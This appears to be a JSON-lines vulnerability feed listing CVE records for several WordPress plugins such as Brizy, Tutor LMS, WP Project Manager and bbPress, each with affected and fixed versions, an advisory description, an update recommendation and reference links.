{"CVE_ID":"CVE-2025-4370","slug":"brizy","versionImpact":"2.6.20","versionEndExcluding":"2.6.21","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to limited file uploads due to missing authorization on process_external_asset_urls function as well as missing path validation in store_file function in all versions up to, and including, 2.6.20. This makes it possible for unauthenticated attackers to upload .TXT files on the affected site's server.","recommendation":"Update to version 2.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/media-processor.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/media-processor.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/static-file-trait.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/static-file-trait.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18f6b4-600d-4c63-a9f2-4e3b8ab4fba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18f6b4-600d-4c63-a9f2-4e3b8ab4fba3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7145","slug":"jet-elements","versionImpact":"2.6.20","versionEndExcluding":"2.6.20.1","description":"The JetElements plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.20 via the 'progress_type' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.6.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793f27ec-a3bb-4273-a41c-cc5b04c8e8fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793f27ec-a3bb-4273-a41c-cc5b04c8e8fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7144","slug":"jet-elements","versionImpact":"2.6.20","versionEndExcluding":"2.6.20.1","description":"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'slide_id' parameters in all versions up to, and including, 2.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e64adf-49b3-4e85-8dc1-918f7e92965b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e64adf-49b3-4e85-8dc1-918f7e92965b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11601","slug":"sky-elementor-addons","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blog, Video Gallery) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the save_options() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note this is limited to option values that can be saved as arrays.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b951fd9-0fbf-4576-80a9-dbb053c3da92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b951fd9-0fbf-4576-80a9-dbb053c3da92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1751","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber\/student access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Utils.php#L4555\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Utils.php#L4555\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5639","slug":"metronet-profile-picture","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The User Profile Picture plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.1 via the 'rest_api_change_profile_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update the profile picture of any user.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a3b9ba-b18a-48d9-8365-d10f79fc6a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a3b9ba-b18a-48d9-8365-d10f79fc6a6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L989\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L989\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L1122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L1122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105132\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105132\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0653","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0627","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom field name column in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied custom fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6748","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.1 via the 'cft' shortcode. This makes it possible for authenticated attackers with contributor access and above, to extract sensitive data including arbitrary post metadata.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fcd0410-9423-4349-8d1c-3551de38a7c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fcd0410-9423-4349-8d1c-3551de38a7c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6745","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cpt' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied post meta. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d07a99-d425-4e1a-8adf-d12071552882?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d07a99-d425-4e1a-8adf-d12071552882?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1503","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the erase_tutor_data() function. This makes it possible for unauthenticated attackers to deactivate the plugin and erase all data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This requires the \"Erase upon uninstallation\" option to be enabled.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Admin.php#L465\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Admin.php#L465\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1502","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tutor_delete_announcement() function in all versions up to, and including, 2.6.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9542","slug":"sky-elementor-addons","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Sky Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.1 via the render function in modules\/content-switcher\/widgets\/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189030\\\/sky-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189030\\\/sky-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a0d9356-8083-4154-aa04-9008627dd3f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a0d9356-8083-4154-aa04-9008627dd3f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12195","slug":"wedevs-project-manager","versionImpact":"2.6.16","versionEndExcluding":"2.6.17","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to SQL Injection via the 'project_id' parameter of the \/wp-json\/pm\/v2\/projects\/2\/task-lists REST API endpoint in all versions up to, and including, 2.6.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, who have been granted access to a project, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.14\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.14\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213295\\\/wedevs-project-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213295\\\/wedevs-project-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798d120a-edec-4af9-b574-46f9beabc491?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798d120a-edec-4af9-b574-46f9beabc491?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10548","slug":"wedevs-project-manager","versionImpact":"2.6.15","versionEndExcluding":"2.6.16","description":"The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List ('\/wp-json\/pm\/v2\/projects\/1\/task-lists') REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. adminstrators).","recommendation":"Update to version 2.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206717\\\/wedevs-project-manager\\\/tags\\\/2.6.16\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206717\\\/wedevs-project-manager\\\/tags\\\/2.6.16\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a21b7c40-2090-4262-9105-346db2325612?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a21b7c40-2090-4262-9105-346db2325612?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10520","slug":"wedevs-project-manager","versionImpact":"2.6.14","versionEndExcluding":"2.6.15","description":"The WP Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'check' method of the 'Create_Milestone', 'Create_Task_List', 'Create_Task', and 'Delete_Task' classes in version 2.6.14. This makes it possible for unauthenticated attackers to create milestones, create task lists, create tasks, or delete tasks in any project. NOTE: Version 2.6.14 implemented a partial fix for this vulnerability.","recommendation":"Update to version 2.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/497760a8-7d4a-45a0-91e4-a8ee27bcdb02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/497760a8-7d4a-45a0-91e4-a8ee27bcdb02?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191204\\\/wedevs-project-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191204\\\/wedevs-project-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10174","slug":"wedevs-project-manager","versionImpact":"2.6.13","versionEndExcluding":"2.6.14","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.13 via the 'Abstract_Permission' class due to missing validation on the 'user_id' user controlled key. This makes it possible for unauthenticated attackers to spoof their identity to that of an administrator and access all of the plugins REST routes.","recommendation":"Update to version 2.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185807\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185807\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2368","slug":"mollie-forms","versionImpact":"2.6.13","versionEndExcluding":"2.6.14","description":"The Mollie Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.13. This is due to missing or incorrect nonce validation on the duplicateForm() function. This makes it possible for unauthenticated attackers to duplicate forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ff10f2-4a5b-42ab-9ee2-95b036ac1c9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ff10f2-4a5b-42ab-9ee2-95b036ac1c9a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097426\\\/mollie-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097426\\\/mollie-forms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13217","slug":"jeg-elementor-kit","versionImpact":"2.6.11","versionEndExcluding":"2.6.12","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.11 via the 'expired_data' and 'build_content' functions. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, and draft template data.","recommendation":"Update to version 2.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-countdown-view.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-countdown-view.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-off-canvas-view.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-off-canvas-view.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246154\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246154\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2136cad8-6b0b-4458-a357-6e98f1ac3e0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2136cad8-6b0b-4458-a357-6e98f1ac3e0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1435","slug":"bbpress","versionImpact":"2.6.11","versionEndExcluding":"2.6.12","description":"The bbPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.11. This is due to missing or incorrect nonce validation on the bbp_user_add_role_on_register() function. This makes it possible for unauthenticated attackers to elevate their privileges to that of a bbPress Keymaster via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Rather than implementing a nonce check to provide protection against this vulnerability, which would break functionality, the plugin no longer makes it possible to select a role during registration.","recommendation":"Update to version 2.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbpress\\\/trunk\\\/includes\\\/users\\\/signups.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bbpress\\\/trunk\\\/includes\\\/users\\\/signups.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247345\\\/bbpress\\\/branches\\\/2.6\\\/includes\\\/users\\\/capabilities.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247345\\\/bbpress\\\/branches\\\/2.6\\\/includes\\\/users\\\/capabilities.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247345%40bbpress&new=3247345%40bbpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3247345%40bbpress&new=3247345%40bbpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d776d94-8c81-4e88-bae3-946824a75c09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d776d94-8c81-4e88-bae3-946824a75c09?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
